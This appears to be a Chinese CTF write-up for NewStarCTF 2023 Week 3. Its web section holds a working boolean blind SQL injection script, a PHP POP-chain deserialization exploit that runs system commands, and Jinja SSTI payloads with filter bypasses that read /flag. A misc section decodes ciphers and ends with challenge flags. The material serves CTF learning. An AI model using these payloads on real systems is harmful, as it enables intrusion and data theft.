NewStarCTF 2023 Week3 官方WriteUp (shimo.im)
web
Include 🍐
pearcmd文件包含
medium_sql
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' %23
回显正常
fuzz一下
order union 被ban 不过很多的大小写没被ban
if没被ban
试试布尔
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' And if(1>0,1,0)%23 回显正常
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' And if(1<0,1,0)%23 无回显
说明布尔盲注可行
^异或
ascii
poc
import requests
import time
i =0
url = "http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/"
result = ""
# for k in range (0,10):
for j in range (1,10000):
l = 32
r = 128
mid = (l+r)>>1
while (l <r ):
# 爆表名
# payload ="?id=TMP0919\' And AScii(SUbstr(database(),{0},1))>{1}%23".format(j,mid)
# 爆库名
# payload = "?id=TMP0919' And ASCii(SUbstr((SElect GRoup_COncat(TAble_NAme) FRom INFORmation_Schema.Tables WHere Table_Schema='ctf'),{0},1))>{1}%23".format(j,mid)
# 爆字段
# payload = "?id=TMP0919' And ASCii(SUbstr((SElect GRoup_COncat(COLUmn_NAme) FRom INFORmation_Schema.COLUmns WHere TAble_NAme='here_is_flag'),{0},1))>{1}%23".format(j, mid)
# payload = "?id=TMP0919' And AScii(SUbstr((SElect flag FRom here_is_flag),{0},1))>{1}%23".format(j,mid)
response = requests.get(url+payload)
time.sleep(0.2)
if "points" in response.text:
l = mid + 1
# print(payload)
#print(response.text)
else :
r = mid
mid = (l +r )>>1
if (chr(mid) == " "):
break
result = result + chr(mid)
i+=1
print(i)
print(result)
print(result)
POP Gadget
Begin::__destruct->Then::__toString->Super::__invoke->Handle::__call->Ctf::end->whitegod::__unset
<?php
class Begin{
public $name;
public function __construct()
{
$this->name=new Then;
}
}
class Then{
private $func;
public function __construct()
{
$this->func=new Super;
}
}
class Handle{
protected $obj;
public function __construct()
{
$this->obj=new CTF;
}
}
class Super{
protected $obj;
public function __construct()
{
$this->obj=new Handle;
}
public function end()
{
die("==GAME OVER==");
}
}
class CTF{
public $handle;
public function __construct()
{
$this->handle=new WhiteGod;
}
}
class WhiteGod{
public $func;
public $var;
public function __construct()
{
$this->func='system';
$this->var='cat /f*'; //readfile(/flag)也行
}
}
echo urlencode(serialize(new Begin));
?>
不知道为什么ls / 没反应
R!!!C!!!E!!!
echo拿来调用__toString方法
由于没有输出,exec执行完命令后没有结果输出,尝试tee命令
ls / | te\e 1
cat /flag_is_h3eeere | te\e 2
GenShin
给name传参?secr3tofpop?name={{4*4}}
被过滤了
传参?secr3tofpop?name={%print(4*4)%}
?name={%print(''__class__)%}
继续被ban,这个被ban的话,就用get_flashed_messages或者url_for(虽然我也不知道这是啥)
?name={%print(get_flashed_messages.__globals__.os['popen']("cat /flag").read() )%}
url_for被ban了
?name={%print(get_flashed_messages.__globals__.os['popen']("cat /flag").read())%} 被过滤
可能是popen被检测到了,试试拼接绕过
?name={%print(get_flashed_messages.__globals__.os['pop'+'en']("cat /flag").read())%}
还是被过滤了,后来才发现是单引号被检测了
?name={%print(get_flashed_messages.__globals__.os["pop"+"en"]("cat /flag").read())%}
flag{0e66f27c-7114-4db2-b82f-817c22b2aeec}
misc
阳光开朗大男孩
secret内容:
法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由
decode:this_password_is_s000_h4rd_p4sssw0rdddd
flag内容:
🙃💵🌿🎤🚪🌏🐎🥋🚫😆😍🌊⏩🔬🚹✉☀☺🚹🐅🎤🛩💵🌿🌊🚰😊🌊✉🐎❓🎈🌉👑🎅📮🥋👣🕹🚪☀🔄🚫🐍❓🐍😊☀🔬🍍🤣🎈🥋🙃👑🌏🐎🌊📮😂💵🏹👉❓😇🍴💧☺💵😁☃👉🎅👁☂🌿👉🍴🌪👌🍴🍵🖐😇🍍😀🗒🗒
网上搜emoij解码emoji-aes
key就是secret解码的内容
没想到key居然是s000_h4rd_p4sssw0rdddd
,难怪一直解码不出来
flag{3m0ji_1s_s0000_1nt3rest1ng_0861aada1050}
大怨种
将gif分离后得到一个二维码,上网搜才知道是汉信码
主要是QR还扫不出来
这个网站就能扫出来
flag{1_d0nt_k0nw_h0w_to_sc4n_th1s_c0d3_acef808a868e}